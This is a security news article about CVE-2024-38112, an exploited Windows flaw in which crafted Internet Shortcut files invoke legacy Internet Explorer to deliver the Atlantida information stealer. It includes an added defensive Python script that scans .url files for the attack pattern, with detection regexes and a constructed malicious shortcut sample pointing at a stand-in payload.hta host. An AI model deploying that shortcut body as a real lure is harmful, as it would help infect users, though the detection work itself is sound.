This Microsoft Windows Warning Affects Over 1 Billion Users
July will not be a good month for Microsoft in terms of security. The images of countless blue screens around the world will remain etched in our memories. And even if the problem was CrowdStrike's and not Microsoft's, appearances matter. The headlines about the outage also make it all too easy to forget the real Windows threats lurking in the background, which security vendors had warned about before the CrowdStrike incident. That kind of oversight can be dangerous.
Earlier this month, before blue screens of death started trending, Check Point and Trend Micro both warned that Windows 10 and 11 users were exposed to a "previously unknown" threat that cleverly awakens Internet Explorer code still buried under the hood of hundreds of millions of PCs, exploiting security holes that remain wide open in that legacy engine.
As Check Point warned on July 9, “the attackers use special Windows Internet shortcut files that, when clicked, call the legacy Internet Explorer (IE) to visit the attacker-controlled URL… By opening the URL with IE instead of the modern and much more secure Chrome/Edge browser on Windows, the attacker gained significant advantages in exploiting the victim’s computer, despite the computer running the modern Windows 10/11 operating system.”
Then, a few days later, Trend Micro raised the threat level, warning that the vulnerability "was used as a zero-day to access and execute files through disabled Internet Explorer using MSHTML… infect[ing] victim machines with the Atlantida information stealer, which focuses on stealing system information and sensitive data (such as passwords and cookies) from various applications."
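The shortcut trick described above can be triaged on disk, since a Windows Internet Shortcut is just an INI-style text file with a `[InternetShortcut]` section and a `URL=` key. The script below is an added example, not code from the article or from Check Point or Trend Micro. It assumes, based on Check Point's public write-up of CVE-2024-38112 rather than anything stated on this page, that the `URL=` value is prefixed with `mhtml:` so that Windows hands the link to the MSHTML/Internet Explorer engine instead of the default browser, and that an `!x-usc:` token inside that value redirects to the attacker-controlled URL. The sample `.url` bodies are constructed for illustration.

```python
"""
Triage Windows Internet Shortcut (.url) files for the legacy-IE invocation pattern.

Added example, not code from the article, Check Point or Trend Micro.
Assumption (taken from Check Point's public write-up of CVE-2024-38112, not from
this page): the shortcut's URL= value starts with "mhtml:" so Windows opens the
link with the MSHTML/Internet Explorer engine rather than the default browser, and
an "!x-usc:" token inside that value redirects to the attacker's URL.
The sample .url bodies at the bottom are constructed for illustration.
"""
import configparser
import re
from dataclasses import dataclass, field

# Indicators looked for in the URL= value of a shortcut.
MHTML_PREFIX = re.compile(r"^\s*mhtml:", re.IGNORECASE)
XUSC_REDIRECT = re.compile(r"!x-usc:", re.IGNORECASE)
HTA_TARGET = re.compile(r"\.hta(?:[?#]|$)", re.IGNORECASE)


@dataclass
class UrlFinding:
    name: str
    target: str
    indicators: list[str] = field(default_factory=list)

    @property
    def suspicious(self) -> bool:
        return bool(self.indicators)


def parse_url_file(text: str) -> dict[str, str]:
    """Parse the INI-style body of a .url file and return the [InternetShortcut] keys."""
    cp = configparser.ConfigParser(interpolation=None, strict=False, delimiters=("=",))
    cp.optionxform = str  # keep key case as written (URL, IconFile, ...)
    try:
        cp.read_string(text)
    except configparser.Error:  # not an INI body at all (no section header, etc.)
        return {}
    if not cp.has_section("InternetShortcut"):
        return {}
    return dict(cp.items("InternetShortcut"))


def triage_url_file(name: str, text: str) -> UrlFinding:
    """Return a finding for one .url file; `suspicious` is True if any indicator fires."""
    target = parse_url_file(text).get("URL", "")
    finding = UrlFinding(name=name, target=target)
    if MHTML_PREFIX.search(target):
        finding.indicators.append("mhtml: prefix hands the link to IE/MSHTML")
    if XUSC_REDIRECT.search(target):
        finding.indicators.append("!x-usc: redirect to a second URL")
    if HTA_TARGET.search(target):
        finding.indicators.append("target is an .hta (HTML Application) file")
    return finding


def scan(files: dict[str, str]) -> list[UrlFinding]:
    """Triage a mapping of file name -> file body and return only the suspicious ones."""
    return [f for f in (triage_url_file(n, t) for n, t in files.items()) if f.suspicious]


# Constructed sample bodies (not real malware artifacts).
SAMPLE_BENIGN = """[InternetShortcut]
URL=https://learn.microsoft.com/
IconIndex=0
"""

SAMPLE_SUSPICIOUS = r"""[InternetShortcut]
URL=mhtml:http://lure.example/doc.pdf!x-usc:http://lure.example/payload.hta
ShowCommand=7
IconIndex=13
IconFile=C:\Windows\System32\SHELL32.dll
"""

if __name__ == "__main__":
    for finding in scan({"invoice.url": SAMPLE_BENIGN, "update.url": SAMPLE_SUSPICIOUS}):
        print(f"{finding.name}: {finding.target}")
        for ind in finding.indicators:
            print(f"  - {ind}")
```

To run it over a mailbox export or a user's Downloads folder, feed `scan()` the bodies of every `*.url` file found with `os.walk`. Treat the result as a first-pass indicator rather than a verdict: `mhtml:` has rare legitimate uses, and the decisive fix is the July update, which closes the IE routing the shortcut depends on.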
Following Check Point's disclosure, the US government added the vulnerability to CISA's Known Exploited Vulnerabilities (KEV) catalog, warning users that Windows has "an impersonation vulnerability that has a high impact on confidentiality, integrity, and availability."
The vulnerability has been patched; users just need to make sure their Windows PCs are up to date. CISA requires federal civilian agencies to apply the update by July 30 or discontinue use of the affected product. All other organizations, and even individuals, should follow suit given the current Windows threat landscape: according to Check Point, Trend Micro, and CISA, this vulnerability has been exploited in the wild. Even more alarming, Check Point says these attacks have been ongoing for more than 12 months.
Microsoft publicly acknowledged that the vulnerability was exploited in its July update, telling me "we greatly appreciate [Check Point's] Haifei Li for this research and for reporting it responsibly as part of a coordinated vulnerability disclosure. Customers who have installed the update are already protected."
Check Point told me the vulnerability was “particularly surprising… in exploiting Internet Explorer, which many users may not even realize is on their computer… All Windows users [should] immediately apply the Microsoft patch to protect yourself.”
Ironically, CVE-2024-38112 isn't the only Internet Explorer vulnerability to be added to CISA's KEV catalog this month. CVE-2012-4792 also just made its debut: a specific warning about a "use-after-free" Internet Explorer memory-corruption vulnerability, despite the browser's end-of-life status. This time, CISA's mandate is even clearer: "The affected product is end-of-life and should be decommissioned if still in use."
The pre-update risk to PC users is best summed up by Trend Micro, which describes it as “a prime example of how unsupported Windows relics represent an overlooked attack surface that can still be exploited by malicious actors to infect unsuspecting users with ransomware, backdoors, or as a conduit for other types of malware.”
This month's Windows outage, whatever the cause, has been front-page news. While the CrowdStrike issue was painful and costly, it is not a cyberthreat in and of itself, though malicious actors are now clearly taking advantage of the confusion. The stealthier threat flagged in CISA's warning is exactly the opposite: you won't know you've been hit until it's too late. So be sure to apply the update if you don't already have it.